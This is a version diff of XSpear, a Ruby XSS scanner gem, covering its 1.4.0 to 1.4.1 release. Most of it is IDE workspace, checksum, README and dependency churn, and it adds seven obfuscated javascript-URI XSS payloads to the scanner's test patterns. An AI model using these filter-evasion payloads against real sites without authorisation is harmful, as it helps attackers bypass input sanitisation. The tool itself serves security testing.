XSpear 1.4.0 → 1.4.1

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 32c726b87b11934044cacd01471bedab0f407185be09ba5018ec7f127d2f111d
4
- data.tar.gz: 1faaf797b99c0e23a7280071c8cd9f010ff23c94dfd29d08edb116bb08b65b0e
3
+ metadata.gz: fc04beec0acfad05b808fd7f261afe330cc0946fe5f1a49bbd781ade4a8d7fe3
4
+ data.tar.gz: 583988a655c70f12bef41463afab6558ee422276effe5bb730a4e29bbc818462
5
5
  SHA512:
6
- metadata.gz: 607af7c1efc237340f376e87a603f5d0f8715de74d0dfa85ca139d1f85406dd3fc2f839b75cb4e9681c2ee3c63e7ced219d1364bc61de7717506a5c63c13c76e
7
- data.tar.gz: 8d5e0667c104e834e3ea7a87ed9f4a79eca542dbc7c039083fc5c425a40460bc960db03f1aa65bc8522a44a0d0d8e6a55f8736f9da721e6445bca88656f61d27
6
+ metadata.gz: bdd144c1a5ef14292b180b041894ca5401dde1a04f21ac168d2c0dee51432e29b2e35d9f575aae8d1ed5903b93644704a4f8432e9742c5eaab085ad9903f9a23
7
+ data.tar.gz: c37d7fac210da1a480679222ad6d50d8eb945353c21a9d819e89a6a0f3f60a25ac65a81ff313518198666ecfe762ddd6c083010a49aaf69a978fc30ef4f193ea
@@ -13,6 +13,7 @@
13
13
  <orderEntry type="library" scope="PROVIDED" name="highline (v2.0.2, ruby-2.3.7-p456) [gem]" level="application" />
14
14
  <orderEntry type="library" scope="PROVIDED" name="options (v2.3.2, ruby-2.3.7-p456) [gem]" level="application" />
15
15
  <orderEntry type="library" scope="PROVIDED" name="progress_bar (v1.3.1, ruby-2.3.7-p456) [gem]" level="application" />
16
+ <orderEntry type="library" scope="PROVIDED" name="rake (v13.0.1, ruby-2.3.7-p456) [gem]" level="application" />
16
17
  <orderEntry type="library" scope="PROVIDED" name="rubyzip (v2.0.0, ruby-2.3.7-p456) [gem]" level="application" />
17
18
  <orderEntry type="library" scope="PROVIDED" name="selenium-webdriver (v3.142.6, ruby-2.3.7-p456) [gem]" level="application" />
18
19
  <orderEntry type="library" scope="PROVIDED" name="terminal-table (v1.8.0, ruby-2.3.7-p456) [gem]" level="application" />
@@ -3,8 +3,7 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
- <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
7
- <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
6
+ <change beforePath="$PROJECT_DIR$/XSpear.gemspec" beforeDir="false" afterPath="$PROJECT_DIR$/XSpear.gemspec" afterDir="false" />
8
7
  <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
9
8
  </list>
10
9
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
@@ -18,28 +17,19 @@
18
17
  </component>
19
18
  <component name="FileEditorManager">
20
19
  <leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
21
- <file pinned="false" current-in-tab="false">
22
- <entry file="file://$PROJECT_DIR$/exe/XSpear">
23
- <provider selected="true" editor-type-id="text-editor">
24
- <state relative-caret-position="1084">
25
- <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
26
- </state>
27
- </provider>
28
- </entry>
29
- </file>
30
20
  <file pinned="false" current-in-tab="false">
31
21
  <entry file="file://$PROJECT_DIR$/raw_sample.txt">
32
22
  <provider selected="true" editor-type-id="text-editor">
33
23
  <state relative-caret-position="30">
34
- <caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
24
+ <caret line="2" column="9" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
35
25
  </state>
36
26
  </provider>
37
27
  </entry>
38
28
  </file>
39
- <file pinned="false" current-in-tab="true">
29
+ <file pinned="false" current-in-tab="false">
40
30
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
41
31
  <provider selected="true" editor-type-id="text-editor">
42
- <state relative-caret-position="217">
32
+ <state relative-caret-position="5415">
43
33
  <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
44
34
  </state>
45
35
  </provider>
@@ -48,17 +38,22 @@
48
38
  <file pinned="false" current-in-tab="false">
49
39
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
50
40
  <provider selected="true" editor-type-id="text-editor">
51
- <state relative-caret-position="260">
52
- <caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
41
+ <state relative-caret-position="519">
42
+ <caret line="567" selection-start-line="567" selection-end-line="567" />
53
43
  </state>
54
44
  </provider>
55
45
  </entry>
56
46
  </file>
47
+ <file pinned="false" current-in-tab="false">
48
+ <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
49
+ <provider selected="true" editor-type-id="text-editor" />
50
+ </entry>
51
+ </file>
57
52
  <file pinned="false" current-in-tab="false">
58
53
  <entry file="file://$PROJECT_DIR$/report.html">
59
54
  <provider selected="true" editor-type-id="text-editor">
60
- <state relative-caret-position="75">
61
- <caret line="5" selection-start-line="5" selection-end-line="5" />
55
+ <state>
56
+ <caret column="124" selection-start-column="124" selection-end-column="124" />
62
57
  </state>
63
58
  </provider>
64
59
  </entry>
@@ -72,11 +67,11 @@
72
67
  </provider>
73
68
  </entry>
74
69
  </file>
75
- <file pinned="false" current-in-tab="false">
70
+ <file pinned="false" current-in-tab="true">
76
71
  <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
77
72
  <provider selected="true" editor-type-id="text-editor">
78
73
  <state relative-caret-position="15">
79
- <caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
74
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
80
75
  </state>
81
76
  </provider>
82
77
  </entry>
@@ -105,8 +100,8 @@
105
100
  <file pinned="false" current-in-tab="false">
106
101
  <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
107
102
  <provider selected="true" editor-type-id="text-editor">
108
- <state relative-caret-position="660">
109
- <caret line="44" column="59" selection-start-line="44" selection-start-column="59" selection-end-line="44" selection-end-column="59" />
103
+ <state relative-caret-position="547">
104
+ <caret line="46" column="53" selection-start-line="46" selection-start-column="53" selection-end-line="46" selection-end-column="53" />
110
105
  </state>
111
106
  </provider>
112
107
  </entry>
@@ -142,24 +137,23 @@
142
137
  <option value="$PROJECT_DIR$/config.json" />
143
138
  <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
144
139
  <option value="$PROJECT_DIR$/README.md" />
145
- <option value="$PROJECT_DIR$/XSpear.gemspec" />
146
140
  <option value="$PROJECT_DIR$/forBurp/otwa.sh" />
147
141
  <option value="$PROJECT_DIR$/forBurp/README.md" />
148
142
  <option value="$PROJECT_DIR$/raw_sample.txt" />
149
143
  <option value="$PROJECT_DIR$/exe/XSpear" />
150
- <option value="$PROJECT_DIR$/report.html" />
151
144
  <option value="$PROJECT_DIR$/custom_payload.json" />
152
- <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
153
- <option value="$PROJECT_DIR$/lib/XSpear.rb" />
154
145
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
146
+ <option value="$PROJECT_DIR$/report.html" />
147
+ <option value="$PROJECT_DIR$/lib/XSpear.rb" />
148
+ <option value="$PROJECT_DIR$/XSpear.gemspec" />
149
+ <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
155
150
  </list>
156
151
  </option>
157
152
  </component>
158
153
  <component name="ProjectFrameBounds" extendedState="6">
159
- <option name="x" value="-1920" />
160
- <option name="y" value="-643" />
161
- <option name="width" value="1920" />
162
- <option name="height" value="1080" />
154
+ <option name="y" value="23" />
155
+ <option name="width" value="1680" />
156
+ <option name="height" value="1027" />
163
157
  </component>
164
158
  <component name="ProjectLevelVcsManager" settingsEditedManually="true">
165
159
  <ConfirmationsSetting value="2" id="Add" />
@@ -169,7 +163,6 @@
169
163
  <foldersAlwaysOnTop value="true" />
170
164
  </navigator>
171
165
  <panes>
172
- <pane id="Scope" />
173
166
  <pane id="ProjectPane">
174
167
  <subPane>
175
168
  <expand>
@@ -207,6 +200,7 @@
207
200
  <select />
208
201
  </subPane>
209
202
  </pane>
203
+ <pane id="Scope" />
210
204
  </panes>
211
205
  </component>
212
206
  <component name="PropertiesComponent">
@@ -274,21 +268,10 @@
274
268
  <workItem from="1580314696983" duration="286000" />
275
269
  <workItem from="1580583824837" duration="1470000" />
276
270
  <workItem from="1581089876742" duration="615000" />
277
- <workItem from="1581425741728" duration="13911000" />
278
- </task>
279
- <task id="LOCAL-00038" summary="(1.0.6) Edit README.md">
280
- <created>1563896886094</created>
281
- <option name="number" value="00038" />
282
- <option name="presentableId" value="LOCAL-00038" />
283
- <option name="project" value="LOCAL" />
284
- <updated>1563896886094</updated>
285
- </task>
286
- <task id="LOCAL-00039" summary="(1.0.7) Releases 1.0.7 (Modify Format, etc..)">
287
- <created>1563897379180</created>
288
- <option name="number" value="00039" />
289
- <option name="presentableId" value="LOCAL-00039" />
290
- <option name="project" value="LOCAL" />
291
- <updated>1563897379180</updated>
271
+ <workItem from="1581425741728" duration="14190000" />
272
+ <workItem from="1581531430817" duration="297000" />
273
+ <workItem from="1582650651760" duration="758000" />
274
+ <workItem from="1583059002049" duration="49000" />
292
275
  </task>
293
276
  <task id="LOCAL-00040" summary="(1.0.8) Add event handler &amp; html5 XSS code, new pattern">
294
277
  <created>1563990681736</created>
@@ -619,11 +602,25 @@
619
602
  <option name="project" value="LOCAL" />
620
603
  <updated>1581530432559</updated>
621
604
  </task>
622
- <option name="localTasksCounter" value="87" />
605
+ <task id="LOCAL-00087" summary="Released 1.4.0!">
606
+ <created>1581530932685</created>
607
+ <option name="number" value="00087" />
608
+ <option name="presentableId" value="LOCAL-00087" />
609
+ <option name="project" value="LOCAL" />
610
+ <updated>1581530932685</updated>
611
+ </task>
612
+ <task id="LOCAL-00088" summary="(Closed #62) Add pattern">
613
+ <created>1582651251008</created>
614
+ <option name="number" value="00088" />
615
+ <option name="presentableId" value="LOCAL-00088" />
616
+ <option name="project" value="LOCAL" />
617
+ <updated>1582651251008</updated>
618
+ </task>
619
+ <option name="localTasksCounter" value="89" />
623
620
  <servers />
624
621
  </component>
625
622
  <component name="TimeTrackingManager">
626
- <option name="totallyTimeSpent" value="90315000" />
623
+ <option name="totallyTimeSpent" value="91698000" />
627
624
  </component>
628
625
  <component name="TodoView">
629
626
  <todo-panel id="selected-file">
@@ -635,10 +632,10 @@
635
632
  </todo-panel>
636
633
  </component>
637
634
  <component name="ToolWindowManager">
638
- <frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
635
+ <frame x="0" y="23" width="1680" height="1027" extended-state="6" />
639
636
  <editor active="true" />
640
637
  <layout>
641
- <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13791268" />
638
+ <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.14163615" />
642
639
  <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
643
640
  <window_info id="Favorites" order="2" side_tool="true" />
644
641
  <window_info anchor="bottom" id="Message" order="0" />
@@ -651,7 +648,7 @@
651
648
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
652
649
  <window_info anchor="bottom" id="Database Changes" order="8" />
653
650
  <window_info anchor="bottom" id="Version Control" order="9" />
654
- <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.2373057" />
651
+ <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.23636363" />
655
652
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
656
653
  <window_info anchor="bottom" id="Messages" order="12" weight="0.32857144" />
657
654
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -664,8 +661,6 @@
664
661
  <option name="version" value="1" />
665
662
  </component>
666
663
  <component name="VcsManagerConfiguration">
667
- <MESSAGE value="(1.1.5)(Fixed #21) not reflected params , no testing. but alway blind xss, other bug fix" />
668
- <MESSAGE value="(1.1.5) Released 1.1.5" />
669
664
  <MESSAGE value="(1.1.6) (Fixed #24) Edit Usage" />
670
665
  <MESSAGE value="(1.1.6) released 1.1.6 (+ fixed #23)" />
671
666
  <MESSAGE value="(1.1.6) Add Event handler pattern (whatthe=&quot;&quot;onload)" />
@@ -689,7 +684,9 @@
689
684
  <MESSAGE value="(1.4 / Fixed #42) Bug fix --raw options, added --raw-ssl" />
690
685
  <MESSAGE value="(1.4 / Closed #52) Added HTML Report" />
691
686
  <MESSAGE value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
692
- <option name="LAST_COMMIT_MESSAGE" value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
687
+ <MESSAGE value="Released 1.4.0!" />
688
+ <MESSAGE value="(Closed #62) Add pattern" />
689
+ <option name="LAST_COMMIT_MESSAGE" value="(Closed #62) Add pattern" />
693
690
  </component>
694
691
  <component name="editorHistoryManager">
695
692
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -702,9 +699,6 @@
702
699
  <entry file="file://$PROJECT_DIR$/bin/setup">
703
700
  <provider selected="true" editor-type-id="text-editor" />
704
701
  </entry>
705
- <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
706
- <provider selected="true" editor-type-id="text-editor" />
707
- </entry>
708
702
  <entry file="file://$PROJECT_DIR$/lib/XSpear/banner.rb">
709
703
  <provider selected="true" editor-type-id="text-editor">
710
704
  <state relative-caret-position="150">
@@ -769,41 +763,31 @@
769
763
  </state>
770
764
  </provider>
771
765
  </entry>
772
- <entry file="file://$PROJECT_DIR$/forBurp/README.md">
773
- <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
774
- <state split_layout="SPLIT">
775
- <first_editor relative-caret-position="105">
776
- <caret line="7" column="16" selection-start-line="7" selection-start-column="16" selection-end-line="7" selection-end-column="16" />
777
- </first_editor>
778
- <second_editor />
779
- </state>
780
- </provider>
781
- </entry>
782
- <entry file="file://$PROJECT_DIR$/forBurp/otwa.sh">
766
+ <entry file="file://$PROJECT_DIR$/exe/XSpear">
783
767
  <provider selected="true" editor-type-id="text-editor">
784
- <state relative-caret-position="375">
785
- <caret line="25" column="32" selection-start-line="25" selection-start-column="32" selection-end-line="25" selection-end-column="32" />
768
+ <state relative-caret-position="1110">
769
+ <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
786
770
  </state>
787
771
  </provider>
788
772
  </entry>
789
- <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
773
+ <entry file="file://$PROJECT_DIR$/raw_sample.txt">
790
774
  <provider selected="true" editor-type-id="text-editor">
791
- <state relative-caret-position="660">
792
- <caret line="44" column="59" selection-start-line="44" selection-start-column="59" selection-end-line="44" selection-end-column="59" />
775
+ <state relative-caret-position="30">
776
+ <caret line="2" column="9" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
793
777
  </state>
794
778
  </provider>
795
779
  </entry>
796
- <entry file="file://$PROJECT_DIR$/raw_sample.txt">
780
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
797
781
  <provider selected="true" editor-type-id="text-editor">
798
- <state relative-caret-position="30">
799
- <caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
782
+ <state relative-caret-position="5415">
783
+ <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
800
784
  </state>
801
785
  </provider>
802
786
  </entry>
803
787
  <entry file="file://$PROJECT_DIR$/report.html">
804
788
  <provider selected="true" editor-type-id="text-editor">
805
- <state relative-caret-position="75">
806
- <caret line="5" selection-start-line="5" selection-end-line="5" />
789
+ <state>
790
+ <caret column="124" selection-start-column="124" selection-end-column="124" />
807
791
  </state>
808
792
  </provider>
809
793
  </entry>
@@ -814,31 +798,44 @@
814
798
  </state>
815
799
  </provider>
816
800
  </entry>
817
- <entry file="file://$PROJECT_DIR$/exe/XSpear">
818
- <provider selected="true" editor-type-id="text-editor">
819
- <state relative-caret-position="1084">
820
- <caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
801
+ <entry file="file://$PROJECT_DIR$/forBurp/README.md">
802
+ <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
803
+ <state split_layout="SPLIT">
804
+ <first_editor relative-caret-position="105">
805
+ <caret line="7" column="16" selection-start-line="7" selection-start-column="16" selection-end-line="7" selection-end-column="16" />
806
+ </first_editor>
807
+ <second_editor />
821
808
  </state>
822
809
  </provider>
823
810
  </entry>
824
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
811
+ <entry file="file://$PROJECT_DIR$/forBurp/otwa.sh">
825
812
  <provider selected="true" editor-type-id="text-editor">
826
- <state relative-caret-position="15">
827
- <caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
813
+ <state relative-caret-position="375">
814
+ <caret line="25" column="32" selection-start-line="25" selection-start-column="32" selection-end-line="25" selection-end-column="32" />
828
815
  </state>
829
816
  </provider>
830
817
  </entry>
831
818
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
832
819
  <provider selected="true" editor-type-id="text-editor">
833
- <state relative-caret-position="260">
834
- <caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
820
+ <state relative-caret-position="519">
821
+ <caret line="567" selection-start-line="567" selection-end-line="567" />
835
822
  </state>
836
823
  </provider>
837
824
  </entry>
838
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
825
+ <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
826
+ <provider selected="true" editor-type-id="text-editor" />
827
+ </entry>
828
+ <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
839
829
  <provider selected="true" editor-type-id="text-editor">
840
- <state relative-caret-position="217">
841
- <caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
830
+ <state relative-caret-position="547">
831
+ <caret line="46" column="53" selection-start-line="46" selection-start-column="53" selection-end-line="46" selection-end-column="53" />
832
+ </state>
833
+ </provider>
834
+ </entry>
835
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
836
+ <provider selected="true" editor-type-id="text-editor">
837
+ <state relative-caret-position="15">
838
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
842
839
  </state>
843
840
  </provider>
844
841
  </entry>
data/README.md CHANGED
@@ -45,8 +45,10 @@ XSpear is XSS Scanner on ruby gems
45
45
  - XSpear running on ruby code(with Gem library)
46
46
  - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
47
47
  - Testing at selected parameters
48
- - Support output format `cli` `json`
49
- + cli: summary, filtered rule(params), Raw Query
48
+ - Support output format `cli` `json` `html`
49
+ + cli
50
+ + json
51
+ + html
50
52
  - Support Verbose level (0~3)
51
53
  + 0: quite mode(only result)
52
54
  + 1: show scanning status(default)
@@ -61,7 +63,7 @@ Install it yourself as:
61
63
 
62
64
  $ gem install XSpear
63
65
 
64
- Or install it yourself as (local file):
66
+ Or install it yourself as (local file / download [latest](https://github.com/hahwul/XSpear/releases/latest) ):
65
67
 
66
68
  $ gem install XSpear-{version}.gem
67
69
 
@@ -390,7 +392,12 @@ __((_)(_)) /(/( /((_))(_))(()\
390
392
  |_| \ /<
391
393
  {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
392
394
  / \<
393
- \> [ v1.1.5 ]
395
+ \> [ v1.4.0 ]
396
+ [*] analysis request..
397
+ [*] used test-reflected-params mode(default)
398
+ [*] creating a test query [for reflected 1 param ]
399
+ [*] test query generation is complete. [251 query]
400
+ [*] starting XSS Scanning. [10 threads]
394
401
  ...snip...
395
402
  [*] finish scan. the report is being generated..
396
403
  +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
@@ -571,6 +578,8 @@ Everyone interacting in the XSpear project’s codebases, issue trackers, chat r
571
578
  <img src="https://user-images.githubusercontent.com/13212227/71557941-c8c17400-2a90-11ea-9cfe-90e9b5d51c34.png" width=100%>
572
579
  < JSON Report >
573
580
  <img src="https://user-images.githubusercontent.com/13212227/63032411-b8996580-bef0-11e9-8aee-0b80fe87f50d.png" width=100%>
581
+ < HTML Report >
582
+ <img src="https://user-images.githubusercontent.com/13212227/74363820-b1570400-4e0e-11ea-9ce5-c78319a9d81c.png" width=100%>
574
583
 
575
584
  ## Video
576
585
  [![asciicast](https://asciinema.org/a/290126.svg)](https://asciinema.org/a/290126)
@@ -44,6 +44,6 @@ Gem::Specification.new do |spec|
44
44
  spec.add_development_dependency "terminal-table" , "~> 1.8.0"
45
45
  spec.add_development_dependency "progress_bar", "~> 1.3.0"
46
46
  spec.add_development_dependency "bundler", "~> 2.0"
47
- spec.add_development_dependency "rake", "~> 10.0"
47
+ spec.add_development_dependency "rake", ">= 12.3.3"
48
48
  spec.add_development_dependency "rspec", "~> 3.0"
49
49
  end
@@ -558,7 +558,13 @@ class XspearScan
558
558
  r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
559
559
  r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
560
560
  r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
561
-
561
+ r.push makeQueryPattern('x', '"\'><a href="jav ascript:alert(45)">XSS</a>', '<a href="jav ascript:alert(45)"">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
562
+ r.push makeQueryPattern('x', '"\'><a href="javascript&colon;alert(45)">XSS</a>', '<a href="javascript&colon;alert(45)">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
563
+ r.push makeQueryPattern('x', '"\'><a href="javascript&#0058;alert(45)">XSS</a>', '<a href="javascript&#0058;alert(45)">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
564
+ r.push makeQueryPattern('x', '"\'><a href="javascript&#0000058alert(45)">XSS</a>', '<a href="javascript&#0000058alert(45)">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
565
+ r.push makeQueryPattern('x', '"\'><a href="&#14; javascript:alert(45)">XSS</a>', '<a href="&#14; javascript:alert(45)">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
566
+ r.push makeQueryPattern('x', '"\'><a href="javascript&#x003a;alert(45)">XSS</a>', '<a href="javascript&#x003a;alert(45)">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
567
+ r.push makeQueryPattern('x', '"\'><a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29">XSS</a>', '<a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29">XSS</a>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
562
568
 
563
569
  onfocus_tags.each do |t|
564
570
  r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.4.0"
2
+ VERSION = "1.4.1"
3
3
  end
@@ -0,0 +1,5 @@
1
+ {
2
+ "extends": [
3
+ "config:base"
4
+ ]
5
+ }
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.4.0
4
+ version: 1.4.1
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2020-02-12 00:00:00.000000000 Z
11
+ date: 2020-03-01 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize
@@ -140,16 +140,16 @@ dependencies:
140
140
  name: rake
141
141
  requirement: !ruby/object:Gem::Requirement
142
142
  requirements:
143
- - - "~>"
143
+ - - ">="
144
144
  - !ruby/object:Gem::Version
145
- version: '10.0'
145
+ version: 12.3.3
146
146
  type: :development
147
147
  prerelease: false
148
148
  version_requirements: !ruby/object:Gem::Requirement
149
149
  requirements:
150
- - - "~>"
150
+ - - ">="
151
151
  - !ruby/object:Gem::Version
152
- version: '10.0'
152
+ version: 12.3.3
153
153
  - !ruby/object:Gem::Dependency
154
154
  name: rspec
155
155
  requirement: !ruby/object:Gem::Requirement
@@ -186,7 +186,6 @@ files:
186
186
  - LICENSE.txt
187
187
  - README.md
188
188
  - Rakefile
189
- - XSpear-1.3.3.gem
190
189
  - XSpear.gemspec
191
190
  - bin/console
192
191
  - bin/setup
@@ -201,6 +200,7 @@ files:
201
200
  - lib/XSpear/log.rb
202
201
  - lib/XSpear/version.rb
203
202
  - raw_sample.txt
203
+ - renovate.json
204
204
  homepage: https://github.com/hahwul/XSpear
205
205
  licenses:
206
206
  - MIT
Binary file